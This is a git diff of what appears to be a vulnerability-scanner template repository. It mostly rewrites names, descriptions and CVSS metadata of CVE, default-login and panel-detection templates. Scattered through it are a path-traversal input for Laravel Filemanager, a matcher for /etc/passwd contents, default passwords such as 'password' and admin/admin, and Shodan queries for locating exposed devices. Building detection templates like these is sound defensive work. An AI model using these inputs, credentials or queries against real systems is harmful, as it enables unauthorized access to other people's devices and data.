https://wordpress.org/plugins/joomsport-sports-league-results-management/ @@ -37,3 +37,5 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' condition: and + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml index bc0d2115f4..4f3eabdbb6 100644 --- a/cves/2022/CVE-2022-40734.yaml +++ b/cves/2022/CVE-2022-40734.yaml @@ -1,11 +1,11 @@ id: CVE-2022-40734 info: - name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal + name: Laravel Filemanager v2.5.1 - Local File Inclusion author: arafatansari severity: medium description: | - UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. + Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F. reference: - https://github.com/UniSharp/laravel-filemanager/issues/1150 - https://nvd.nist.gov/vuln/detail/CVE-2022-40734 @@ -30,3 +30,5 @@ requests: - type: regex regex: - "root:[x*]:0:0" + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml index 71ca0ccec7..bafbfd6b54 100644 --- a/cves/2022/CVE-2022-40881.yaml +++ b/cves/2022/CVE-2022-40881.yaml @@ -5,7 +5,7 @@ info: author: For3stCo1d severity: critical description: | - SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php + SolarView Compact 6.00 is vulnerable to a command injection via network_test.php. reference: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - https://github.com/advisories/GHSA-wx3r-88rg-whxq @@ -42,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index b664082bef..d608fd824e 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -1,16 +1,16 @@ id: CVE-2022-41840 info: - name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal + name: Welcart eCommerce <=2.7.7 - Local File Inclusion author: theamanrawat severity: critical description: | - Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress. + Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve + - https://nvd.nist.gov/vuln/detail/CVE-2022-41840 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -40,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2023/01/15 diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml index 306b16c300..aec0369ef1 100644 --- a/cves/2022/CVE-2022-4260.yaml +++ b/cves/2022/CVE-2022-4260.yaml @@ -1,16 +1,16 @@ id: CVE-2022-4260 info: - name: WP-Ban < 1.69.1 - Admin Stored XSS + name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting author: Hardik-Solanki severity: medium description: | - The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). + WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup. + remediation: Fixed in version 1.69.1. reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk - remediation: Fixed in version 1.69.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 @@ -66,3 +66,5 @@ requests: regex: - '_wpnonce=([0-9a-z]+)' internal: true + +# Enhanced by md on 2023/01/06 diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml index 49e6e876c8..f7a86568eb 100644 --- a/cves/2022/CVE-2022-46381.yaml +++ b/cves/2022/CVE-2022-46381.yaml @@ -1,14 +1,15 @@ id: CVE-2022-46381 info: - name: Certain Linear eMerge E3-Series - Cross Site Scripting + name: Linear eMerge E3-Series - Cross-Site Scripting author: arafatansari severity: medium description: | - Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. + Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt + - https://nvd.nist.gov/vuln/detail/CVE-2022-46381 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/3com/3com-nj2000-default-login.yaml b/default-logins/3com/3com-nj2000-default-login.yaml index 2a4a0f802c..031b8ad73a 100644 --- a/default-logins/3com/3com-nj2000-default-login.yaml +++ b/default-logins/3com/3com-nj2000-default-login.yaml @@ -1,12 +1,16 @@ id: 3com-nj2000-default-login info: - name: 3COM NJ2000 Default Login + name: 3COM NJ2000 - Default Login author: daffainfo severity: high - description: 3COM NJ2000 default admin credentials were discovered. + description: 3COM NJ2000 contains a default login vulnerability. Default admin login password of 'password' was found. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.title:"ManageEngine Password" @@ -34,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/aem/aem-felix-console.yaml b/default-logins/aem/aem-felix-console.yaml index 5ef065808d..03f5cca189 100644 --- a/default-logins/aem/aem-felix-console.yaml +++ b/default-logins/aem/aem-felix-console.yaml @@ -1,13 +1,17 @@ id: aem-felix-console info: - name: AEM Felix Console + name: Adobe Experience Manager Felix Console - Default Login author: DhiyaneshDk severity: high - description: Felix Console is exposed, you may get RCE by installing OSGI bundle. + description: Adobe Experience Manager Felix Console contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. Remote code execution may also be possible via installation of OSGI bundle. reference: - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py - https://github.com/0ang3el/aem-rce-bundle + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: - http.title:"AEM Sign In" @@ -45,3 +49,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/apache/karaf-default-login.yaml b/default-logins/apache/karaf-default-login.yaml index 46e2b4b2a3..618345b17b 100644 --- a/default-logins/apache/karaf-default-login.yaml +++ b/default-logins/apache/karaf-default-login.yaml @@ -1,12 +1,16 @@ id: karaf-default-login info: - name: Apache Karaf Default Login + name: Apache Karaf - Default Login author: s0obi severity: high - description: Apache Karaf default login credentials were discovered. + description: Apache Karaf contains a default login vulnerability. Default login credentials were detected. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://karaf.apache.org/manual/latest/webconsole + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: realm="karaf" @@ -34,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/apache/ranger-default-login.yaml b/default-logins/apache/ranger-default-login.yaml index 34e46cbd76..91e6fe280f 100644 --- a/default-logins/apache/ranger-default-login.yaml +++ b/default-logins/apache/ranger-default-login.yaml @@ -1,10 +1,16 @@ id: ranger-default-login info: - name: Apache Ranger Default Login + name: Apache Ranger - Default Login author: For3stCo1d severity: high - reference: https://github.com/apache/ranger + description: Apache Ranger contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/apache/ranger + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: http.title:"Ranger - Sign In" tags: apache,ranger,default-login @@ -37,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/audiocodes/audiocodes-default-login.yaml b/default-logins/audiocodes/audiocodes-default-login.yaml index 9a00378ea6..b55bd57f3d 100644 --- a/default-logins/audiocodes/audiocodes-default-login.yaml +++ b/default-logins/audiocodes/audiocodes-default-login.yaml @@ -1,10 +1,10 @@ id: audiocodes-default-login info: - name: Audiocodes 310HD, 320HD, 420HD, 430HD & 440HD Default Login + name: AudioCodes 310HD, 320HD, 420HD, 430HD & 440HD - Default Login author: d4vy severity: high - description: Audiocodes 310HD, 320HD, 420HD, 430HD & 440HD default login credentials were discovered. + description: AudioCodes devices 310HD, 320HD, 420HD, 430HD & 440HD contain a default login vulnerability. Default login credentials were discovered. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://wiki.freepbx.org/display/FPG/Supported+Devices-Audio+Codes#:~:text=Reset%20to%20Factory%20Defaults,-Press%20the%20Menu&text=Then%2C%20enter%20the%20Admin%20password,is%20%221234%22%20by%20default classification: @@ -43,3 +43,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/datahub/datahub-metadata-default-login.yaml b/default-logins/datahub/datahub-metadata-default-login.yaml index cf3a4243b3..7745fe574c 100644 --- a/default-logins/datahub/datahub-metadata-default-login.yaml +++ b/default-logins/datahub/datahub-metadata-default-login.yaml @@ -1,11 +1,16 @@ id: datahub-metadata-default-login info: - name: DataHub Metadata Default Login + name: DataHub Metadata - Default Login author: queencitycyber severity: high + description: DataHub Metadata contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/datahub-project/datahub/blob/master/docs/rfc/active/access-control/access-control.md + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.title:"DataHub" @@ -37,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/dataiku/dataiku-default-login.yaml b/default-logins/dataiku/dataiku-default-login.yaml index acc94d4e8d..f242cd742d 100644 --- a/default-logins/dataiku/dataiku-default-login.yaml +++ b/default-logins/dataiku/dataiku-default-login.yaml @@ -1,12 +1,16 @@ id: dataiku-default-login info: - name: Dataiku Default Login + name: Dataiku - Default Login author: random-robbie severity: high - description: Dataiku default login which allows SSRF/RCE etc. + description: Dataiku contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. This vulnerability may also lead to server-side request forgery and/or remote code execution. reference: - https://www.dataiku.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: title:"dataiku" @@ -31,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/hybris/hybris-default-login.yaml b/default-logins/hybris/hybris-default-login.yaml index d05cb64835..519904070a 100644 --- a/default-logins/hybris/hybris-default-login.yaml +++ b/default-logins/hybris/hybris-default-login.yaml @@ -1,9 +1,10 @@ id: hybris-default-login info: - name: Hybris Default Login + name: Hybris - Default Login author: princechaddha severity: high + description: Hybris contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 @@ -60,3 +61,5 @@ requests: group: 1 regex: - '' + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/kanboard-default-login.yaml b/default-logins/kanboard-default-login.yaml index ba7472dad9..c335dfc975 100644 --- a/default-logins/kanboard-default-login.yaml +++ b/default-logins/kanboard-default-login.yaml @@ -1,14 +1,18 @@ id: kanboard-default-login info: - name: Kanboard Default Login + name: Kanboard - Default Login author: shelled severity: high - description: Kanboard default login was discovered. + description: Kanboard contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://twitter.com/0x_rood/status/1607068644634157059 - https://github.com/kanboard/kanboard - https://docs.kanboard.org/v1/admin/installation/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.favicon.hash:2056442365 @@ -58,3 +62,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/kettle/kettle-default-login.yaml b/default-logins/kettle/kettle-default-login.yaml index 2bc0ed7d38..453a43c86a 100644 --- a/default-logins/kettle/kettle-default-login.yaml +++ b/default-logins/kettle/kettle-default-login.yaml @@ -1,9 +1,14 @@ id: kettle-default-login info: - name: Kettle Default Login + name: Kettle - Default Login author: For3stCo1d severity: medium + description: Kettle contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 metadata: verified: true shodan-query: basic realm="Kettle" @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/lutron/lutron-default-login.yaml b/default-logins/lutron/lutron-default-login.yaml index 5192be1179..e881d1a524 100644 --- a/default-logins/lutron/lutron-default-login.yaml +++ b/default-logins/lutron/lutron-default-login.yaml @@ -1,12 +1,17 @@ id: lutron-default-login info: - name: Lutron Device Default Login + name: Lutron - Default Login author: geeknik severity: high + description: Multiple Lutron devices contain a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.lutron.com - https://vulners.com/openvas/OPENVAS:1361412562310113206 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: default-login,lutron,iot requests: @@ -39,3 +44,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/mobotix/mobotix-default-login.yaml b/default-logins/mobotix/mobotix-default-login.yaml index de1c8e67ef..2c47cdcd3e 100644 --- a/default-logins/mobotix/mobotix-default-login.yaml +++ b/default-logins/mobotix/mobotix-default-login.yaml @@ -1,10 +1,10 @@ id: mobotix-default-credentials info: - name: Mobotix Webcam Default Admin Credentials + name: Mobotix - Default Login author: robotshell severity: high - description: Mobotix Camera default admin login credentials. + description: Mobotix contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.mobotix.com/sites/default/files/2020-01/mx_RM_CameraSoftwareManual_en_200131.pdf classification: @@ -40,3 +40,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/06 diff --git a/default-logins/nsicg/nsicg-default-login.yaml b/default-logins/nsicg/nsicg-default-login.yaml index efa86f6907..55fbcff289 100644 --- a/default-logins/nsicg/nsicg-default-login.yaml +++ b/default-logins/nsicg/nsicg-default-login.yaml @@ -1,13 +1,17 @@ id: nsicg-default-login info: - name: Ns-icg Default Login + name: Netentsec NS-ICG - Default Login author: pikpikcu severity: high description: | - There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole. + Netentsec NS-ICG contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: | - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true fofa-query: "NS-ICG" @@ -46,3 +50,5 @@ requests: - 'status_code_2 == 200' - contains(body_2, "var loguser = \'ns25000") condition: and + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/oracle/peoplesoft-default-login.yaml b/default-logins/oracle/peoplesoft-default-login.yaml index 7542ab1189..11f7933e4d 100644 --- a/default-logins/oracle/peoplesoft-default-login.yaml +++ b/default-logins/oracle/peoplesoft-default-login.yaml @@ -1,10 +1,10 @@ id: peoplesoft-default-login info: - name: Oracle PeopleSoft Default Login + name: Oracle PeopleSoft - Default Login author: LogicalHunter severity: high - description: Oracle peoplesoft default admin credentials were discovered. + description: Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.oracle.com/applications/peoplesoft/ - https://erpscan.io/press-center/blog/peoplesoft-default-accounts/ @@ -81,3 +81,5 @@ requests: - type: status status: - 302 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/others/kingsoft-v8-default-login.yaml b/default-logins/others/kingsoft-v8-default-login.yaml index 174e26d5fe..5761b97476 100644 --- a/default-logins/others/kingsoft-v8-default-login.yaml +++ b/default-logins/others/kingsoft-v8-default-login.yaml @@ -1,11 +1,16 @@ id: kingsoft-v8-default-login info: - name: Kingsoft V8 Default Login + name: Kingsoft 8 - Default Login author: ritikchaddha severity: high + description: Kingsoft version 8 contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://idc.wanyunshuju.com/aqld/2123.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: kingsoft,default-login requests: @@ -37,3 +42,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/others/opencats-default-login.yaml b/default-logins/others/opencats-default-login.yaml index 10a74aaaf2..1817dd1ee6 100644 --- a/default-logins/others/opencats-default-login.yaml +++ b/default-logins/others/opencats-default-login.yaml @@ -1,10 +1,10 @@ id: opencats-default-login info: - name: OpenCATS Default Login + name: OpenCATS - Default Login author: arafatansari severity: high - description: OpenCATS default admin login information was discovered. + description: OpenCATS contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 @@ -52,3 +52,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/phpmyadmin/phpmyadmin-default-login.yaml b/default-logins/phpmyadmin/phpmyadmin-default-login.yaml index 6ee0117dde..cc1fc1275d 100644 --- a/default-logins/phpmyadmin/phpmyadmin-default-login.yaml +++ b/default-logins/phpmyadmin/phpmyadmin-default-login.yaml @@ -1,18 +1,21 @@ id: phpmyadmin-default-login info: - name: phpMyAdmin Default Login + name: phpMyAdmin - Default Login author: Natto97 severity: high - description: phpMyAdmin default admin credentials were discovered + description: phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.phpmyadmin.net + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.title:phpMyAdmin tags: default-login,phpmyadmin - requests: - raw: - | @@ -71,3 +74,5 @@ requests: - status_code_2 == 302 - contains(all_headers_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(all_headers_2, '/index.php?route=/&route=%2F') condition: and + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/prtg/prtg-default-login.yaml b/default-logins/prtg/prtg-default-login.yaml index 118d3528b9..5ac0a86851 100644 --- a/default-logins/prtg/prtg-default-login.yaml +++ b/default-logins/prtg/prtg-default-login.yaml @@ -1,10 +1,10 @@ id: prtg-default-login info: - name: PRTG Network Monitor Default Login + name: PRTG Network Monitor - Hardcoded Credentials author: johnk3r severity: high - description: PRTG default admin credentials were discovered. + description: PRTG Network Monitor contains a hardcoded credential vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://www.paessler.com/manuals/prtg/login classification: @@ -41,3 +41,5 @@ requests: - type: status status: - 302 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/ruckus/ruckus-wireless-default-login.yaml b/default-logins/ruckus/ruckus-wireless-default-login.yaml index b6a9395a2f..1c0413f3d6 100644 --- a/default-logins/ruckus/ruckus-wireless-default-login.yaml +++ b/default-logins/ruckus/ruckus-wireless-default-login.yaml @@ -1,14 +1,19 @@ id: ruckus-wireless-default-login info: - name: Ruckus Wireless Admin Default Login Credential + name: Ruckus Wireless - Default Login author: pussycat0x severity: critical + description: Ruckus Wireless router contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://docs.commscope.com/bundle/fastiron-08092-securityguide/page/GUID-32D3BB01-E600-4FBE-B555-7570B5024D34.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: title:"ruckus" - reference: - - https://docs.commscope.com/bundle/fastiron-08092-securityguide/page/GUID-32D3BB01-E600-4FBE-B555-7570B5024D34.html tags: default-login,router,ruckus requests: @@ -42,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/samsung/samsung-printer-default-login.yaml b/default-logins/samsung/samsung-printer-default-login.yaml index 25e1f5f85c..1cd7514067 100644 --- a/default-logins/samsung/samsung-printer-default-login.yaml +++ b/default-logins/samsung/samsung-printer-default-login.yaml @@ -1,13 +1,17 @@ id: samsung-printer-default-login info: - name: Samsung Printer Default Login + name: Samsung Printer - Default Login author: gy741 severity: high description: | - Samsung Printer default login credentials were discovered. + Samsung printers contain a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://support.hp.com/gb-en/document/c05591673 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: title:"SyncThru Web Service" @@ -45,3 +49,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/tiny-file-manager-default-login.yaml b/default-logins/tiny-file-manager-default-login.yaml index 7866e367c8..da153b9556 100644 --- a/default-logins/tiny-file-manager-default-login.yaml +++ b/default-logins/tiny-file-manager-default-login.yaml @@ -1,13 +1,17 @@ id: tiny-filemanager-default-login info: - name: Tiny File Manager Default Login + name: Tiny File Manager - Default Login author: shelled severity: high - description: Tiny File Manager default login was discovered. + description: Tiny File Manager contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/prasathmani/tinyfilemanager - https://tinyfilemanager.github.io/docs/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: html:"Tiny File Manager" @@ -61,3 +65,5 @@ requests: regex: - '([a-f0-9]{64})' internal: true + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/tooljet/tooljet-default-login.yaml b/default-logins/tooljet/tooljet-default-login.yaml index 75273d654e..ec49a8d591 100644 --- a/default-logins/tooljet/tooljet-default-login.yaml +++ b/default-logins/tooljet/tooljet-default-login.yaml @@ -1,13 +1,17 @@ id: tooljet-default-login info: - name: ToolJet Default Login Credential + name: ToolJet - Default Login author: random-robbie severity: high description: | - toolJet is an open-source low-code framework to build and deploy custom internal tools. ToolJet can connect to your data sources such as databases ( PostgreSQL, MongoDB, MS SQL Server, Snowflake, , BigQuery, etc ), API/GraphQL endpoints, SaaS tools ( Airtable, Stripe, Google Sheets, etc ) and cloud object storage services ( AWS S3, Google Cloud Storage and Minio ) + ToolJet contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://docs.tooljet.com/docs/contributing-guide/setup/docker/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: title:"tooljet" @@ -46,3 +50,5 @@ requests: - type: status status: - 201 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/versa/versa-flexvnf-default-login.yaml b/default-logins/versa/versa-flexvnf-default-login.yaml index b5f582fdfd..031796a1a0 100644 --- a/default-logins/versa/versa-flexvnf-default-login.yaml +++ b/default-logins/versa/versa-flexvnf-default-login.yaml @@ -1,11 +1,16 @@ id: versa-flexvnf-default-login info: - name: Versa FlexVNF Web-UI - Default Login + name: Versa FlexVNF - Default Login author: c-sh0 severity: high + description: Versa FlexVNF contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://versa-networks.com/products/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: title:"Flex VNF Web-UI" @@ -55,3 +60,5 @@ requests: part: header regex: - '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)' + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/xnat/xnat-default-login.yaml b/default-logins/xnat/xnat-default-login.yaml index 8c9a28b01e..50ded5f56f 100644 --- a/default-logins/xnat/xnat-default-login.yaml +++ b/default-logins/xnat/xnat-default-login.yaml @@ -1,12 +1,16 @@ id: xnat-default-login info: - name: XNAT Default Login + name: XNAT - Default Login author: 0x_Akoko severity: high - description: XNAT default login information (admin/admin) was discovered. + description: XNAT contains an admin default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://wiki.xnat.org/documentation/xnat-administration/xnat-setup-first-time-configuration#:~:text=Log%20in%20with%20the%20username%20admin%20and%20password%20admin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.title:"XNAT" @@ -40,3 +44,5 @@ requests: - type: status status: - 302 + +# Enhanced by md on 2023/01/09 diff --git a/default-logins/xui-weak-login.yaml b/default-logins/xui-weak-login.yaml index 173b1aa638..5d9b0c0979 100644 --- a/default-logins/xui-weak-login.yaml +++ b/default-logins/xui-weak-login.yaml @@ -1,11 +1,11 @@ id: xui-weak-login info: - name: X-UI Login Default Login + name: X-UI - Default Login author: dali severity: high description: | - X-UI Default Login Credentials. + X-UI contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://github.com/vaxilu/x-ui - https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20. @@ -46,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2023/01/09 diff --git a/exposed-panels/atlantis-detect.yaml b/exposed-panels/atlantis-detect.yaml index eae9b30d00..a80ac7315e 100644 --- a/exposed-panels/atlantis-detect.yaml +++ b/exposed-panels/atlantis-detect.yaml @@ -1,11 +1,16 @@ id: atlantis-detect info: - name: Atlantis Detect + name: Atlantis Panel - Detect author: jonathanwalker severity: info + description: Atlantis panel was detected. reference: - https://github.com/runatlantis/atlantis + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-1706783005 @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 